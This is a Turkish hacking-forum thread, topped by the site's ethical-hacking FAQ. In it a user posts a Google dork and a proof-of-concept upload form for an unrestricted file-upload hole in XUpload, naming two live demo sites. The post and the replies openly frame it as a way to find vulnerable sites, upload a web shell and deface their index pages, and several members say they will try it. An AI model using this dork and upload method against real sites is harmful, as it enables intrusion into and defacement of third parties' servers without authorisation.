Exploit XUpload Dork / Her Kes Hack Yapsin...

Q: Türkiye'nin En Büyük Hack Forumu SpyHackerz mı?

SpyHackerz, Türkiye'nin en aktif ve en köklü siber güvenlik forum topluluklarından biridir. Binlerce üyesiyle etik hacking, siber güvenlik ve penetrasyon testi konularında Türkiye'nin lider platformlarından biri olmaya devam etmektedir.

Q: Üye olmak ücretli mi?

Hayır, SpyHackerz'e üye olmak tamamen ücretsizdir. Kayıt olarak topluluğa katılabilir, içeriklere erişebilir ve forum tartışmalarına katılabilirsiniz.

Q: Ethical hacking nedir?

Etik hacking, sistemlerin güvenlik açıklarını yetkili bir şekilde test etme ve raporlama sürecidir. Etik hackerlar, kötü niyetli saldırganlardan önce açıkları bularak kurumların güvenliğini artırmalarına yardımcı olur.

Q: Siber güvenlik öğrenmek için nereden başlamalıyım?

Siber güvenliğe başlamak için önce temel ağ ve işletim sistemi bilgisi edinmeniz önerilir. Ardından SpyHackerz forumundaki eğitim kategorilerini takip edebilir, CTF yarışmalarına katılabilir ve TryHackMe ile HackTheBox üzerinde pratik yapabilirsiniz.

Q: Nasıl etik hacker olurum?

Etik hacker olmak için Linux, ağ protokolleri ve programlama temellerini öğrenmekle başlayabilirsiniz. CEH, OSCP gibi sertifikalar kariyerinizi güçlendirir. SpyHackerz topluluğu bu yolculukta size rehberlik edecek binlerce kaynak ve deneyimli üye sunmaktadır.

Dj_Taleh · 5 Kas 2020

Merhaba Yeni Cikan Dork Bu Iyi Heyklemeler Her Kese.. Yakinda Iyi Videolar Olacak .gov Ile Alakali Dorklar.

XUpload Uzaktan Dosya Yükleme Güvenlik Açığı
2020.11.04
Risk: Yüksek
Yerel: Hayır
Uzaktan: Evet
CVE: Yok
CWE: CWE-434
Dork: intext: "XUpload Tarafından Desteklenmektedir"

# Başlık: XUpload Uzaktan Dosya Yükleme Güvenlik Açığı
# tarih: 2020-11-04
# Üzerinde test edildi: Windows 10 ve Google Chrome
# Kategori: Web Uygulama Hataları
# Dork: intext: "XUpload Tarafından Desteklenmektedir"

### NOT:

* Kabuğunuzu yüklemek veya tahrif etmek için atlayabilirsiniz.

### POC:

* Exploit 1: site.com/[folder]/[file]

<form enctype = "multipart / form-data" action = "/ cgi-bin / upload.cgi? upload_id =" method = "post" onSubmit = "return StartUpload (this);" target = "xupload">
Dosya gönder: <input name = "file_1" type = "file" onChange = "checkExt (this.value)"> <br>
Yorum: <input type = "text" name = "comment"> (isteğe bağlı)
<br> <br>
<Input type = "checkbox" name = "popup"> <label FOR = "popup" ACCESSKEY = "Z"> Yükleme durumunu açılır pencerede göster </label> <br>
<br>
<input type = "submit" value = "Dosya Yükle">
</form>

### Demo:

* http://www.satyrlp.sorokine.fr
* http://50.116.78.206/uploadtest/upload_form.html

Demiя · 5 Kas 2020

Eline sağlık reis

HackerWhoAmI · 5 Kas 2020

Eline emegine saglik Taleh

LETRX · 5 Kas 2020

Güzel gerekliydi deneyelim bakalım, teşekkürler.

JESUS · 5 Kas 2020

Eyw reis bende ariyordum

ᴊᴇᴇᴢʏ · 5 Kas 2020

Bu ne anlatacak var mı

Dj_Taleh · 5 Kas 2020

Letrx' Alıntı:
Güzel gerekliydi deneyelim bakalım, teşekkürler.

Eyv Bakariz Tabii

Dj_Taleh · 5 Kas 2020

aygij2534' Alıntı:
Bu ne anlatacak var mı

Bu bi dork qardas web sitede olan cms yuklulerin bosluklarini ariyoraun bulup shell atip index yediriyon bu gibi yani. Ayrica yeniysense arastir forumu ilgili konular vardir bi suru

ParZ · 5 Kas 2020

Eyw aga

LOXY · 16 Kas 2020

EMEĞİNE SAĞLIK DOSTUM

egomanyak · 19 Ara 2020

Exploit XUpload Dork / Her Kes Hack Yapsin...

Daha fazla seçenek

Dj_Taleh

Old User / Hack3r

Demiя

Bekliyor

HackerWhoAmI

LETRX

Abracadabra

JESUS

Aga cinayet var.

ᴊᴇᴇᴢʏ

Dj_Taleh

Old User / Hack3r

Dj_Taleh

Old User / Hack3r

ParZ

print(fake.profile())

LOXY

Para için değil Zevk için Yaparız.

egomanyak

About Us & Legal Notice